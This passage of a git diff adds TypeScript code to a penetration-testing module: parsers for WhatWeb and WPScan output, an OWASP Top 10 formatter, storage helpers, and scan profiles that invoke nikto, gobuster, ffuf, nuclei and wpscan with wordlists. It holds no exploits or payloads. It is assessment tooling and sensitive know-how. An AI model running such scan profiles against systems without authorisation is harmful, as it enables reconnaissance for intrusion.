+   */
+  export function format(result: WebScanTypes.OwaspCategorization): string {
+    const lines = ["OWASP Top 10 2021 Categorization", "=".repeat(40), ""]
+
+    // Summary
+    const sortedCategories = Object.entries(result.summary)
+      .filter(([, count]) => count > 0)
+      .sort((a, b) => b[1] - a[1])
+
+    if (sortedCategories.length === 0) {
+      lines.push("No findings to categorize.")
+      return lines.join("\n")
+    }
+
+    lines.push("Summary:")
+    for (const [category, count] of sortedCategories) {
+      const shortName = category.replace("A", "").split("-")[0]
+      lines.push(`  ${shortName}: ${count} finding(s) - ${getCategoryName(category as WebScanTypes.OwaspCategory)}`)
+    }
+
+    lines.push("")
+    lines.push(`Total: ${result.findings.length} findings categorized`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get human-readable category name.
+   */
+  export function getCategoryName(category: WebScanTypes.OwaspCategory): string {
+    const names: Record<WebScanTypes.OwaspCategory, string> = {
+      "A01:2021-Broken_Access_Control": "Broken Access Control",
+      "A02:2021-Cryptographic_Failures": "Cryptographic Failures",
+      "A03:2021-Injection": "Injection",
+      "A04:2021-Insecure_Design": "Insecure Design",
+      "A05:2021-Security_Misconfiguration": "Security Misconfiguration",
+      "A06:2021-Vulnerable_and_Outdated_Components": "Vulnerable and Outdated Components",
+      "A07:2021-Identification_and_Authentication_Failures": "Identification and Authentication Failures",
+      "A08:2021-Software_and_Data_Integrity_Failures": "Software and Data Integrity Failures",
+      "A09:2021-Security_Logging_and_Monitoring_Failures": "Security Logging and Monitoring Failures",
+      "A10:2021-Server-Side_Request_Forgery": "Server-Side Request Forgery (SSRF)",
+      Uncategorized: "Uncategorized",
+    }
+    return names[category]
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/parsers/index.ts b/packages/opencode/src/pentest/webscan/parsers/index.ts
new file mode 100644
index 00000000000..ce0950584f0
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/parsers/index.ts
@@ -0,0 +1,10 @@
+/**
+ * @fileoverview Web Scanner Parsers
+ *
+ * Export all web scanning tool parsers.
+ *
+ * @module pentest/webscan/parsers
+ */
+
+export { WPScanParser } from "./wpscan"
+export { WhatWebParser } from "./whatweb"
diff --git a/packages/opencode/src/pentest/webscan/parsers/whatweb.ts b/packages/opencode/src/pentest/webscan/parsers/whatweb.ts
new file mode 100644
index 00000000000..3ab26dc41e8
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/parsers/whatweb.ts
@@ -0,0 +1,360 @@
+/**
+ * @fileoverview WhatWeb Parser
+ *
+ * Parse WhatWeb JSON output for web technology fingerprinting.
+ *
+ * @module pentest/webscan/parsers/whatweb
+ */
+
+import { WebScanTypes } from "../types"
+import { PentestTypes } from "../../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "webscan.parser.whatweb" })
+
+/**
+ * WhatWeb parser namespace.
+ */
+export namespace WhatWebParser {
+  /**
+   * Parse WhatWeb JSON output.
+   *
+   * @param output - Raw WhatWeb JSON output
+   * @returns Parsed WhatWeb results (one per target)
+   */
+  export function parse(output: string): WebScanTypes.WhatWebResult[] {
+    try {
+      const data = JSON.parse(output)
+
+      // WhatWeb outputs an array of results
+      const results: WebScanTypes.WhatWebResult[] = []
+
+      const entries = Array.isArray(data) ? data : [data]
+
+      for (const entry of entries) {
+        const result: WebScanTypes.WhatWebResult = {
+          target: entry.target || "",
+          httpStatus: entry.http_status,
+          technologies: [],
+          timestamp: Date.now(),
+        }
+
+        // Parse plugins (technologies)
+        if (entry.plugins) {
+          for (const [name, pluginData] of Object.entries(entry.plugins as Record<string, any>)) {
+            // Skip internal plugins
+            if (name === "HTTPServer" || name === "IP" || name === "Country") continue
+
+            const tech: WebScanTypes.WhatWebTechnology = {
+              name,
+              module: pluginData.module,
+            }
+
+            // Extract version
+            if (pluginData.version) {
+              tech.version = Array.isArray(pluginData.version) ? pluginData.version[0] : String(pluginData.version)
+            }
+
+            // Extract string matches
+            if (pluginData.string) {
+              tech.string = Array.isArray(pluginData.string) ? pluginData.string : [String(pluginData.string)]
+            }
+
+            result.technologies.push(tech)
+          }
+        }
+
+        // Extract headers if available
+        if (entry.plugins?.HTTPServer?.string) {
+          const server = entry.plugins.HTTPServer.string
+          result.headers = {
+            Server: Array.isArray(server) ? server[0] : String(server),
+          }
+        }
+
+        results.push(result)
+      }
+
+      return results
+    } catch (error) {
+      log.warn("Failed to parse WhatWeb JSON output", { error: String(error) })
+      return []
+    }
+  }
+
+  /**
+   * Parse WhatWeb text output (fallback).
+   *
+   * @param output - Raw WhatWeb text output
+   * @returns Parsed WhatWeb results
+   */
+  export function parseText(output: string): WebScanTypes.WhatWebResult[] {
+    const results: WebScanTypes.WhatWebResult[] = []
+    const lines = output.split("\n").filter((l) => l.trim())
+
+    for (const line of lines) {
+      // WhatWeb text format: URL [Status] Tech1, Tech2[version], ...
+      const match = line.match(/^(https?:\/\/[^\s]+)\s*\[(\d+).*?\]\s*(.*)$/)
+      if (!match) continue
+
+      const [, target, status, techString] = match
+      const result: WebScanTypes.WhatWebResult = {
+        target,
+        httpStatus: parseInt(status, 10),
+        technologies: [],
+        timestamp: Date.now(),
+      }
+
+      // Parse technologies from the tech string
+      const techParts = techString.split(/,\s*/)
+      for (const part of techParts) {
+        // Match: TechName[version] or TechName[detail] or just TechName
+        const techMatch = part.match(/^([^\[]+)(?:\[([^\]]+)\])?/)
+        if (techMatch) {
+          const [, name, detail] = techMatch
+          const tech: WebScanTypes.WhatWebTechnology = {
+            name: name.trim(),
+          }
+
+          // Check if detail looks like a version
+          if (detail) {
+            if (/^\d+[\d.]*/.test(detail)) {
+              tech.version = detail
+            } else {
+              tech.string = [detail]
+            }
+          }
+
+          result.technologies.push(tech)
+        }
+      }
+
+      results.push(result)
+    }
+
+    return results
+  }
+
+  /**
+   * Format WhatWeb result for display.
+   *
+   * @param result - Parsed WhatWeb result
+   * @returns Formatted string
+   */
+  export function format(result: WebScanTypes.WhatWebResult): string {
+    const lines: string[] = []
+
+    lines.push(`WhatWeb Results for ${result.target}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    if (result.httpStatus) {
+      lines.push(`HTTP Status: ${result.httpStatus}`)
+    }
+
+    if (result.technologies.length > 0) {
+      lines.push("")
+      lines.push("Detected Technologies:")
+      for (const tech of result.technologies) {
+        let line = `  - ${tech.name}`
+        if (tech.version) {
+          line += ` ${tech.version}`
+        }
+        if (tech.string && tech.string.length > 0) {
+          line += ` (${tech.string.join(", ")})`
+        }
+        lines.push(line)
+      }
+    } else {
+      lines.push("")
+      lines.push("No technologies detected.")
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format multiple WhatWeb results.
+   *
+   * @param results - Array of parsed WhatWeb results
+   * @returns Formatted string
+   */
+  export function formatAll(results: WebScanTypes.WhatWebResult[]): string {
+    if (results.length === 0) {
+      return "No WhatWeb results."
+    }
+    return results.map(format).join("\n\n")
+  }
+
+  /**
+   * Generate summary of WhatWeb result.
+   *
+   * @param result - Parsed WhatWeb result
+   * @returns Summary string
+   */
+  export function summarize(result: WebScanTypes.WhatWebResult): string {
+    const techCount = result.technologies.length
+    const techNames = result.technologies
+      .slice(0, 5)
+      .map((t) => t.name)
+      .join(", ")
+    const suffix = techCount > 5 ? ` and ${techCount - 5} more` : ""
+    return `${result.target} | HTTP ${result.httpStatus || "?"} | ${techNames}${suffix}`
+  }
+
+  /**
+   * Convert WhatWeb result to security findings.
+   *
+   * @param result - Parsed WhatWeb result
+   * @param target - Target URL
+   * @param sessionID - Session ID
+   * @param scanID - Scan ID
+   * @returns Array of findings
+   */
+  export function toFindings(
+    result: WebScanTypes.WhatWebResult,
+    target: string,
+    sessionID: string,
+    scanID?: string
+  ): Omit<PentestTypes.Finding, "id" | "createdAt">[] {
+    const findings: Omit<PentestTypes.Finding, "id" | "createdAt">[] = []
+
+    // Check for potentially vulnerable technologies
+    const vulnerableTech = checkVulnerableTechnologies(result.technologies)
+
+    for (const vuln of vulnerableTech) {
+      findings.push({
+        sessionID,
+        scanID,
+        title: vuln.title,
+        description: vuln.description,
+        severity: vuln.severity,
+        status: "open",
+        target,
+        service: vuln.service,
+        evidence: vuln.evidence,
+        remediation: vuln.remediation,
+      })
+    }
+
+    // Check for server version disclosure
+    const serverTech = result.technologies.find(
+      (t) => t.name.toLowerCase().includes("apache") || t.name.toLowerCase().includes("nginx") || t.name.toLowerCase().includes("iis")
+    )
+
+    if (serverTech && serverTech.version) {
+      findings.push({
+        sessionID,
+        scanID,
+        title: "Web Server Version Disclosure",
+        description: `The web server discloses its version in HTTP headers`,
+        severity: "info",
+        status: "open",
+        target,
+        service: serverTech.name.toLowerCase(),
+        evidence: `Server: ${serverTech.name} ${serverTech.version}`,
+        remediation: "Configure the web server to hide version information",
+      })
+    }
+
+    // PHP version disclosure
+    const phpTech = result.technologies.find((t) => t.name === "PHP")
+    if (phpTech && phpTech.version) {
+      findings.push({
+        sessionID,
+        scanID,
+        title: "PHP Version Disclosure",
+        description: `PHP version is disclosed in HTTP headers`,
+        severity: "low",
+        status: "open",
+        target,
+        service: "php",
+        evidence: `PHP ${phpTech.version}`,
+        remediation: "Set expose_php = Off in php.ini",
+      })
+    }
+
+    return findings
+  }
+
+  /**
+   * Check for known vulnerable technology patterns.
+   */
+  function checkVulnerableTechnologies(
+    technologies: WebScanTypes.WhatWebTechnology[]
+  ): Array<{
+    title: string
+    description: string
+    severity: PentestTypes.Severity
+    service: string
+    evidence: string
+    remediation: string
+  }> {
+    const results: Array<{
+      title: string
+      description: string
+      severity: PentestTypes.Severity
+      service: string
+      evidence: string
+      remediation: string
+    }> = []
+
+    for (const tech of technologies) {
+      // Check for outdated jQuery
+      if (tech.name === "jQuery" && tech.version) {
+        const version = tech.version.split(".").map(Number)
+        if (version[0] < 3 || (version[0] === 3 && version[1] < 5)) {
+          results.push({
+            title: "Outdated jQuery Version",
+            description: `jQuery version ${tech.version} may contain known vulnerabilities`,
+            severity: "medium",
+            service: "jquery",
+            evidence: `jQuery ${tech.version}`,
+            remediation: "Update jQuery to version 3.5.0 or later",
+          })
+        }
+      }
+
+      // Check for WordPress without version
+      if (tech.name === "WordPress") {
+        const severity = tech.version ? "info" : "low"
+        results.push({
+          title: tech.version ? "WordPress Detected" : "WordPress Version Hidden",
+          description: tech.version
+            ? `WordPress ${tech.version} detected - check for known vulnerabilities`
+            : "WordPress is detected but version is hidden",
+          severity,
+          service: "wordpress",
+          evidence: `WordPress ${tech.version || "(version hidden)"}`,
+          remediation: tech.version ? "Ensure WordPress is up to date" : "Verify WordPress is up to date",
+        })
+      }
+
+      // Check for Drupal
+      if (tech.name === "Drupal") {
+        results.push({
+          title: "Drupal CMS Detected",
+          description: `Drupal ${tech.version || "(version unknown)"} detected - check for known vulnerabilities`,
+          severity: "info",
+          service: "drupal",
+          evidence: `Drupal ${tech.version || "(version unknown)"}`,
+          remediation: "Ensure Drupal is up to date and all modules are patched",
+        })
+      }
+
+      // Check for Joomla
+      if (tech.name === "Joomla") {
+        results.push({
+          title: "Joomla CMS Detected",
+          description: `Joomla ${tech.version || "(version unknown)"} detected - check for known vulnerabilities`,
+          severity: "info",
+          service: "joomla",
+          evidence: `Joomla ${tech.version || "(version unknown)"}`,
+          remediation: "Ensure Joomla is up to date and all extensions are patched",
+        })
+      }
+    }
+
+    return results
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/parsers/wpscan.ts b/packages/opencode/src/pentest/webscan/parsers/wpscan.ts
new file mode 100644
index 00000000000..6ad7cf644d3
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/parsers/wpscan.ts
@@ -0,0 +1,332 @@
+/**
+ * @fileoverview WPScan Parser
+ *
+ * Parse WPScan JSON output for WordPress vulnerability scanning.
+ *
+ * @module pentest/webscan/parsers/wpscan
+ */
+
+import { WebScanTypes } from "../types"
+import { PentestTypes } from "../../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "webscan.parser.wpscan" })
+
+/**
+ * WPScan parser namespace.
+ */
+export namespace WPScanParser {
+  /**
+   * Parse WPScan JSON output.
+   *
+   * @param output - Raw WPScan JSON output
+   * @returns Parsed WPScan result
+   */
+  export function parse(output: string): WebScanTypes.WPScanResult {
+    try {
+      const data = JSON.parse(output)
+
+      const result: WebScanTypes.WPScanResult = {
+        target: data.target_url || data.url || "",
+        timestamp: Date.now(),
+      }
+
+      // Parse WordPress version
+      if (data.version) {
+        result.version = {
+          number: data.version.number,
+          status: data.version.status,
+          vulnerabilities: parseVulnerabilities(data.version.vulnerabilities || []),
+        }
+      }
+
+      // Parse main theme
+      if (data.main_theme) {
+        result.mainTheme = {
+          name: data.main_theme.slug || data.main_theme.name,
+          version: data.main_theme.version?.number,
+          vulnerabilities: parseVulnerabilities(data.main_theme.vulnerabilities || []),
+        }
+      }
+
+      // Parse plugins
+      if (data.plugins) {
+        result.plugins = {}
+        for (const [name, pluginData] of Object.entries(data.plugins as Record<string, any>)) {
+          result.plugins[name] = {
+            version: pluginData.version?.number,
+            vulnerabilities: parseVulnerabilities(pluginData.vulnerabilities || []),
+          }
+        }
+      }
+
+      // Parse users
+      if (data.users) {
+        result.users = Object.keys(data.users)
+      }
+
+      // Parse password attack results
+      if (data.password_attack) {
+        result.passwordAttack = {
+          found: data.password_attack,
+        }
+      }
+
+      return result
+    } catch (error) {
+      log.warn("Failed to parse WPScan JSON output", { error: String(error) })
+      return {
+        target: "",
+        timestamp: Date.now(),
+      }
+    }
+  }
+
+  /**
+   * Parse vulnerability array.
+   */
+  function parseVulnerabilities(vulns: any[]): WebScanTypes.WPScanVulnerability[] {
+    return vulns.map((v) => ({
+      title: v.title || "",
+      fixedIn: v.fixed_in,
+      references: v.references,
+      cvss: v.cvss
+        ? {
+            score: v.cvss.score,
+            vector: v.cvss.vector,
+          }
+        : undefined,
+    }))
+  }
+
+  /**
+   * Format WPScan result for display.
+   *
+   * @param result - Parsed WPScan result
+   * @returns Formatted string
+   */
+  export function format(result: WebScanTypes.WPScanResult): string {
+    const lines: string[] = []
+
+    lines.push(`WPScan Results for ${result.target}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    // WordPress version
+    if (result.version) {
+      lines.push(`WordPress Version: ${result.version.number || "Unknown"}`)
+      if (result.version.status) {
+        lines.push(`  Status: ${result.version.status}`)
+      }
+      if (result.version.vulnerabilities && result.version.vulnerabilities.length > 0) {
+        lines.push(`  Vulnerabilities: ${result.version.vulnerabilities.length}`)
+        for (const vuln of result.version.vulnerabilities) {
+          lines.push(`    - ${vuln.title}`)
+        }
+      }
+      lines.push("")
+    }
+
+    // Theme
+    if (result.mainTheme) {
+      lines.push(`Main Theme: ${result.mainTheme.name || "Unknown"}`)
+      if (result.mainTheme.version) {
+        lines.push(`  Version: ${result.mainTheme.version}`)
+      }
+      if (result.mainTheme.vulnerabilities && result.mainTheme.vulnerabilities.length > 0) {
+        lines.push(`  Vulnerabilities: ${result.mainTheme.vulnerabilities.length}`)
+        for (const vuln of result.mainTheme.vulnerabilities) {
+          lines.push(`    - ${vuln.title}`)
+        }
+      }
+      lines.push("")
+    }
+
+    // Plugins
+    if (result.plugins && Object.keys(result.plugins).length > 0) {
+      lines.push(`Plugins: ${Object.keys(result.plugins).length}`)
+      for (const [name, plugin] of Object.entries(result.plugins)) {
+        const vulnCount = plugin.vulnerabilities?.length || 0
+        lines.push(`  - ${name} (${plugin.version || "unknown"})${vulnCount > 0 ? ` [${vulnCount} vulns]` : ""}`)
+      }
+      lines.push("")
+    }
+
+    // Users
+    if (result.users && result.users.length > 0) {
+      lines.push(`Enumerated Users: ${result.users.join(", ")}`)
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Generate summary of WPScan result.
+   *
+   * @param result - Parsed WPScan result
+   * @returns Summary string
+   */
+  export function summarize(result: WebScanTypes.WPScanResult): string {
+    let totalVulns = 0
+
+    if (result.version?.vulnerabilities) {
+      totalVulns += result.version.vulnerabilities.length
+    }
+    if (result.mainTheme?.vulnerabilities) {
+      totalVulns += result.mainTheme.vulnerabilities.length
+    }
+    if (result.plugins) {
+      for (const plugin of Object.values(result.plugins)) {
+        totalVulns += plugin.vulnerabilities?.length || 0
+      }
+    }
+
+    const pluginCount = result.plugins ? Object.keys(result.plugins).length : 0
+    const userCount = result.users?.length || 0
+
+    return `WordPress ${result.version?.number || "unknown"} | ${pluginCount} plugins | ${totalVulns} vulnerabilities | ${userCount} users`
+  }
+
+  /**
+   * Convert WPScan result to security findings.
+   *
+   * @param result - Parsed WPScan result
+   * @param target - Target URL
+   * @param sessionID - Session ID
+   * @param scanID - Scan ID
+   * @returns Array of findings
+   */
+  export function toFindings(
+    result: WebScanTypes.WPScanResult,
+    target: string,
+    sessionID: string,
+    scanID?: string
+  ): Omit<PentestTypes.Finding, "id" | "createdAt">[] {
+    const findings: Omit<PentestTypes.Finding, "id" | "createdAt">[] = []
+
+    // WordPress version vulnerabilities
+    if (result.version?.vulnerabilities) {
+      for (const vuln of result.version.vulnerabilities) {
+        findings.push({
+          sessionID,
+          scanID,
+          title: vuln.title,
+          description: `WordPress core vulnerability in version ${result.version.number}`,
+          severity: getSeverity(vuln.cvss?.score),
+          status: "open",
+          target,
+          service: "wordpress",
+          evidence: `WordPress version: ${result.version.number}. Fixed in: ${vuln.fixedIn || "unknown"}`,
+          remediation: vuln.fixedIn ? `Update WordPress to version ${vuln.fixedIn} or later` : "Update WordPress to the latest version",
+          references: extractReferences(vuln.references),
+          cve: extractCVEs(vuln.references),
+        })
+      }
+    }
+
+    // Theme vulnerabilities
+    if (result.mainTheme?.vulnerabilities) {
+      for (const vuln of result.mainTheme.vulnerabilities) {
+        findings.push({
+          sessionID,
+          scanID,
+          title: vuln.title,
+          description: `Theme vulnerability in ${result.mainTheme.name}`,
+          severity: getSeverity(vuln.cvss?.score),
+          status: "open",
+          target,
+          service: "wordpress-theme",
+          evidence: `Theme: ${result.mainTheme.name}, Version: ${result.mainTheme.version || "unknown"}`,
+          remediation: vuln.fixedIn ? `Update theme to version ${vuln.fixedIn} or later` : "Update theme to the latest version",
+          references: extractReferences(vuln.references),
+          cve: extractCVEs(vuln.references),
+        })
+      }
+    }
+
+    // Plugin vulnerabilities
+    if (result.plugins) {
+      for (const [name, plugin] of Object.entries(result.plugins)) {
+        if (plugin.vulnerabilities) {
+          for (const vuln of plugin.vulnerabilities) {
+            findings.push({
+              sessionID,
+              scanID,
+              title: vuln.title,
+              description: `Plugin vulnerability in ${name}`,
+              severity: getSeverity(vuln.cvss?.score),
+              status: "open",
+              target,
+              service: "wordpress-plugin",
+              evidence: `Plugin: ${name}, Version: ${plugin.version || "unknown"}`,
+              remediation: vuln.fixedIn ? `Update plugin to version ${vuln.fixedIn} or later` : "Update plugin to the latest version or remove if not needed",
+              references: extractReferences(vuln.references),
+              cve: extractCVEs(vuln.references),
+            })
+          }
+        }
+      }
+    }
+
+    // Enumerated users finding
+    if (result.users && result.users.length > 0) {
+      findings.push({
+        sessionID,
+        scanID,
+        title: "WordPress User Enumeration",
+        description: `${result.users.length} WordPress users were enumerated`,
+        severity: "low",
+        status: "open",
+        target,
+        service: "wordpress",
+        evidence: `Enumerated users: ${result.users.join(", ")}`,
+        remediation: "Disable user enumeration by configuring WordPress properly",
+      })
+    }
+
+    return findings
+  }
+
+  /**
+   * Get severity from CVSS score.
+   */
+  function getSeverity(score: string | undefined): PentestTypes.Severity {
+    if (!score) return "medium"
+    const numScore = parseFloat(score)
+    if (numScore >= 9.0) return "critical"
+    if (numScore >= 7.0) return "high"
+    if (numScore >= 4.0) return "medium"
+    if (numScore >= 0.1) return "low"
+    return "info"
+  }
+
+  /**
+   * Extract references from WPScan references object.
+   */
+  function extractReferences(refs: Record<string, string[]> | undefined): string[] | undefined {
+    if (!refs) return undefined
+    const result: string[] = []
+
+    if (refs.url) result.push(...refs.url)
+    if (refs.wpvulndb) {
+      result.push(...refs.wpvulndb.map((id) => `https://wpscan.com/vulnerability/${id}`))
+    }
+    if (refs.exploitdb) {
+      result.push(...refs.exploitdb.map((id) => `https://www.exploit-db.com/exploits/${id}`))
+    }
+    if (refs.metasploit) {
+      result.push(...refs.metasploit.map((m) => `https://www.rapid7.com/db/modules/${m}`))
+    }
+
+    return result.length > 0 ? result : undefined
+  }
+
+  /**
+   * Extract CVEs from WPScan references object.
+   */
+  function extractCVEs(refs: Record<string, string[]> | undefined): string[] | undefined {
+    if (!refs?.cve) return undefined
+    return refs.cve.map((id) => `CVE-${id}`)
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/profiles.ts b/packages/opencode/src/pentest/webscan/profiles.ts
new file mode 100644
index 00000000000..5eb3f8eee8c
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/profiles.ts
@@ -0,0 +1,178 @@
+/**
+ * @fileoverview Scan Profiles
+ *
+ * Pre-defined scan profiles for different scanning scenarios.
+ *
+ * @module pentest/webscan/profiles
+ */
+
+import { WebScanTypes } from "./types"
+
+/**
+ * Scan profiles namespace.
+ */
+export namespace ScanProfiles {
+  /**
+   * Quick scan profile - fast initial assessment.
+   */
+  export const Quick: WebScanTypes.ScanProfile = {
+    id: "quick",
+    name: "Quick Scan",
+    description: "Fast initial assessment with basic web fingerprinting and vulnerability scanning",
+    crawl: {
+      enabled: true,
+      maxDepth: 1,
+      maxUrls: 50,
+    },
+    tools: ["whatweb", "nikto"],
+    toolOptions: {
+      nikto: ["-Tuning", "123"], // Basic scan
+    },
+  }
+
+  /**
+   * Standard scan profile - balanced depth and coverage.
+   */
+  export const Standard: WebScanTypes.ScanProfile = {
+    id: "standard",
+    name: "Standard Scan",
+    description: "Balanced scan with directory enumeration and vulnerability scanning",
+    crawl: {
+      enabled: true,
+      maxDepth: 2,
+      maxUrls: 200,
+    },
+    tools: ["whatweb", "nikto", "gobuster", "nuclei"],
+    toolOptions: {
+      gobuster: ["-w", "/usr/share/wordlists/dirb/common.txt"],
+      nuclei: ["-severity", "medium,high,critical"],
+    },
+  }
+
+  /**
+   * Thorough scan profile - comprehensive coverage.
+   */
+  export const Thorough: WebScanTypes.ScanProfile = {
+    id: "thorough",
+    name: "Thorough Scan",
+    description: "Comprehensive scan with all available tools and deep crawling",
+    crawl: {
+      enabled: true,
+      maxDepth: 3,
+      maxUrls: 500,
+    },
+    tools: ["whatweb", "nikto", "gobuster", "ffuf", "nuclei", "wpscan", "wafw00f"],
+    toolOptions: {
+      gobuster: ["-w", "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"],
+      ffuf: ["-w", "/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt"],
+      nuclei: ["-severity", "info,low,medium,high,critical"],
+      nikto: ["-Tuning", "123456789abc"],
+    },
+  }
+
+  /**
+   * Passive scan profile - reconnaissance only.
+   */
+  export const Passive: WebScanTypes.ScanProfile = {
+    id: "passive",
+    name: "Passive Scan",
+    description: "Non-intrusive reconnaissance with fingerprinting and WAF detection only",
+    crawl: {
+      enabled: false,
+      maxDepth: 0,
+      maxUrls: 0,
+    },
+    tools: ["whatweb", "wafw00f"],
+    toolOptions: {},
+  }
+
+  /**
+   * Custom scan profile - user-configurable.
+   */
+  export const Custom: WebScanTypes.ScanProfile = {
+    id: "custom",
+    name: "Custom Scan",
+    description: "User-configurable scan profile",
+    crawl: {
+      enabled: true,
+      maxDepth: 2,
+      maxUrls: 100,
+    },
+    tools: [],
+    toolOptions: {},
+  }
+
+  /**
+   * All predefined profiles.
+   */
+  export const all: WebScanTypes.ScanProfile[] = [Quick, Standard, Thorough, Passive, Custom]
+
+  /**
+   * Get profile by ID.
+   */
+  export function get(id: WebScanTypes.ProfileId): WebScanTypes.ScanProfile {
+    const profile = all.find((p) => p.id === id)
+    if (!profile) {
+      throw new Error(`Unknown profile: ${id}`)
+    }
+    return profile
+  }
+
+  /**
+   * Get profile description for display.
+   */
+  export function describe(profile: WebScanTypes.ScanProfile): string {
+    const lines = [`${profile.name} (${profile.id})`]
+    lines.push(profile.description)
+    lines.push("")
+
+    if (profile.crawl.enabled) {
+      lines.push(`Crawl: depth=${profile.crawl.maxDepth}, maxUrls=${profile.crawl.maxUrls}`)
+    } else {
+      lines.push("Crawl: disabled")
+    }
+
+    lines.push(`Tools: ${profile.tools.join(", ") || "(none)"}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * List all profiles as a formatted string.
+   */
+  export function list(): string {
+    return all.map((p) => `- ${p.id}: ${p.description}`).join("\n")
+  }
+
+  /**
+   * Create a custom profile with overrides.
+   */
+  export function createCustom(overrides: {
+    crawl?: Partial<WebScanTypes.ProfileCrawlConfig>
+    tools?: string[]
+    toolOptions?: Record<string, string[]>
+  }): WebScanTypes.ScanProfile {
+    return {
+      ...Custom,
+      crawl: {
+        ...Custom.crawl,
+        ...overrides.crawl,
+      },
+      tools: overrides.tools || Custom.tools,
+      toolOptions: overrides.toolOptions || Custom.toolOptions,
+    }
+  }
+
+  /**
+   * Get available tools across all profiles.
+   */
+  export function availableTools(): string[] {
+    const tools = new Set<string>()
+    for (const profile of all) {
+      for (const tool of profile.tools) {
+        tools.add(tool)
+      }
+    }
+    return Array.from(tools).sort()
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/storage.ts b/packages/opencode/src/pentest/webscan/storage.ts
new file mode 100644
index 00000000000..362848be825
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/storage.ts
@@ -0,0 +1,347 @@
+/**
+ * @fileoverview Web Scan Storage
+ *
+ * Storage helpers for crawl and scan results.
+ *
+ * @module pentest/webscan/storage
+ */
+
+import { randomBytes } from "crypto"
+import { Storage } from "../../storage/storage"
+import { WebScanTypes } from "./types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "webscan.storage" })
+
+/**
+ * Generate a unique crawl ID.
+ */
+function generateCrawlId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `crawl_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique scan ID.
+ */
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `scan_${timestamp}_${random}`
+}
+
+/**
+ * Storage configuration.
+ */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+}
+
+/**
+ * Web scan storage namespace.
+ */
+export namespace WebScanStorage {
+  /** In-memory buffers for testing */
+  const crawlBuffer: WebScanTypes.CrawlResult[] = []
+  const scanBuffer: WebScanTypes.ScanResult[] = []
+
+  /**
+   * Save a crawl result.
+   *
+   * @param result - Crawl result (id will be generated if not provided)
+   * @param config - Storage configuration
+   * @returns Saved result with ID
+   */
+  export async function saveCrawl(
+    result: Omit<WebScanTypes.CrawlResult, "id"> | WebScanTypes.CrawlResult,
+    config: StorageConfig = {}
+  ): Promise<WebScanTypes.CrawlResult> {
+    const full: WebScanTypes.CrawlResult = {
+      ...result,
+      id: "id" in result && result.id ? result.id : generateCrawlId(),
+    }
+    const validated = WebScanTypes.CrawlResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = crawlBuffer.findIndex((c) => c.id === validated.id)
+      if (existingIdx >= 0) {
+        crawlBuffer[existingIdx] = validated
+      } else {
+        crawlBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "webscan", "crawls", validated.id], validated)
+    }
+
+    log.info("Crawl result saved", {
+      id: validated.id,
+      target: validated.target,
+      urlsDiscovered: validated.urls.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get a crawl result by ID.
+   *
+   * @param id - Crawl ID
+   * @param config - Storage configuration
+   * @returns Crawl result or null if not found
+   */
+  export async function getCrawl(id: string, config: StorageConfig = {}): Promise<WebScanTypes.CrawlResult | null> {
+    if (config.storage === "memory") {
+      return crawlBuffer.find((c) => c.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<WebScanTypes.CrawlResult>(["pentest", "webscan", "crawls", id])
+      return WebScanTypes.CrawlResult.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List crawl results with filters.
+   *
+   * @param config - Storage configuration
+   * @param filters - Optional filters
+   * @returns Array of crawl results
+   */
+  export async function listCrawls(
+    config: StorageConfig = {},
+    filters?: {
+      target?: string
+      status?: WebScanTypes.Status
+      limit?: number
+    }
+  ): Promise<WebScanTypes.CrawlResult[]> {
+    let crawls: WebScanTypes.CrawlResult[]
+
+    if (config.storage === "memory") {
+      crawls = [...crawlBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "webscan", "crawls"])
+      crawls = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<WebScanTypes.CrawlResult>(key)
+          crawls.push(WebScanTypes.CrawlResult.parse(data))
+        } catch {
+          log.warn("Failed to parse crawl file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.target) {
+      crawls = crawls.filter((c) => c.target === filters.target)
+    }
+    if (filters?.status) {
+      crawls = crawls.filter((c) => c.status === filters.status)
+    }
+
+    // Sort by start time (newest first)
+    crawls.sort((a, b) => b.startedAt - a.startedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      crawls = crawls.slice(0, filters.limit)
+    }
+
+    return crawls
+  }
+
+  /**
+   * Delete a crawl result.
+   *
+   * @param id - Crawl ID
+   * @param config - Storage configuration
+   * @returns true if deleted, false if not found
+   */
+  export async function deleteCrawl(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = crawlBuffer.findIndex((c) => c.id === id)
+      if (idx >= 0) {
+        crawlBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "webscan", "crawls", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
